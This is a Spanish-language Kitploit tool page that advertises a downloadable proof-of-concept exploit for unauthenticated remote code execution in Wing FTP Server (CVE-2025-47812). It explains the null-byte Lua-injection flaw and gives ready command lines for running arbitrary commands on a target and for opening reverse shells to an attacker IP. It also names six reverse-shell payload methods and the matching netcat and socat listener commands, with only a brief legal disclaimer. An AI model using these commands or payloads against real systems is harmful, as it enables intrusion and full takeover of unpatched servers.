Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-47812-PoC — Exploit de ejecución remota de código no autenticado para Wing FTP Server (CVE-2025-47812) con múltiples payloads de reverse shell, modos interactivo y de línea de comandos, y manejo automatizado de sesiones. | Kitploit
Herramientas/GitHubGitHub/havbay/cve-2025-47812-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed TeamingHerramienta de Acceso Remoto
GitHubhavbay/cve-2025-47812-poc

CVE-2025-47812-PoC

Exploit de ejecución remota de código no autenticado para Wing FTP Server (CVE-2025-47812) con múltiples payloads de reverse shell, modos interactivo y de línea de comandos, y manejo automatizado de sesiones.

1hace 6 mesesAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-47812 — Ejecución Remota de Código (RCE) en Wing FTP Server

Python CVSS Type

Resumen

CampoValor
CVECVE-2025-47812
AfectadoWing FTP Server < 7.4.4
TipoEjecución Remota de Código sin Autenticación
Puntuación CVSS10.0 (Crítico)
Corregido enWing FTP Server 7.4.4

Cómo funciona

La vulnerabilidad existe en el endpoint de inicio de sesión /loginok.html. El servidor no puede sanitizar los bytes nulos (%00) en el campo username. Esto permite a un atacante inyectar código Lua arbitrario en archivos de sesión, que luego son evaluados del lado del servidor cuando se accede a endpoints como /dir.html — sin necesidad de autenticación.

Referencia: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


Características

  • Ejecución de comandos sin autenticación
  • Múltiples payloads de reverse shell (socat, bash, python3, nc-e, nc-fifo, php)
  • Payload de socat priorizado para TTY interactivo completo
  • Verificación previa de accesibilidad del objetivo
  • Extracción automática de UID de sesión con sesión nueva por intento
  • Seleccionar un payload específico con la opción --payload
  • Guardar salida del comando en archivo con -o
  • --timeout y --delay configurables
  • Modo verbose/debug con -v
  • Manejo elegante de Ctrl+C
  • Resumen de payloads después de intentos de reverse shell
  • Modo de argumentos CLI + menú interactivo
  • Salida con colores

Requisitos

root@kitploit:~
pip install requests

Uso

Modo interactivo

root@kitploit:~
python3 wingftp_rce_exploit.py

Modo CLI

root@kitploit:~
# Ejecutar un comando
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"

# Guardar salida en archivo
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt

# Reverse shell (probar todos los payloads)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444

# Reverse shell (payload específico)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat

Todas las opciones

root@kitploit:~
-u / --url        URL base del objetivo
-U / --username   Nombre de usuario (por defecto: anonymous)
-c / --command    Comando a ejecutar (modo comando)
-r / --rhost      IP de tu listener (modo reverse shell)
-p / --rport      Puerto de tu listener (modo reverse shell)
     --payload    Payload específico a usar (ver lista abajo)
     --timeout    Tiempo de espera de solicitud HTTP en segundos (por defecto: 10)
     --delay      Demora entre intentos de payload en segundos (por defecto: 4)
-o / --output     Guardar salida del comando en archivo
-v / --verbose    Habilitar salida de depuración

Payloads de Reverse Shell

NombreMétodo
socatPTY completo vía socat
bashRedirección /dev/tcp
python3Subproceso socket
nc-eNetcat con bandera -e
nc-fifoNetcat + mkfifo
phpPHP fsockopen

Ejemplos

Ejecución de comandos

root@kitploit:~
URL objetivo : http://192.168.1.10:5466
Usuario      : anonymous
Opción       : 1
Comando      : whoami

Reverse shell

Paso 1 — Inicia tu listener (se recomienda socat para TTY completo):

root@kitploit:~
socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr

O con nc:

root@kitploit:~
nc -lvnp 4444

Paso 2 — Ejecuta el exploit:

root@kitploit:~
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444

Créditos

  • PoC original por blindma1den
  • Mejorado y ampliado por Havbuy

Aviso legal

Esta herramienta está destinada únicamente a fines educativos y pruebas de seguridad autorizadas.
NO la uses contra sistemas que no poseas o para los que no tengas permiso explícito por escrito para realizar pruebas.
El uso no autorizado es ilegal. Los autores no aceptan responsabilidad por el mal uso.

Descargar herramienta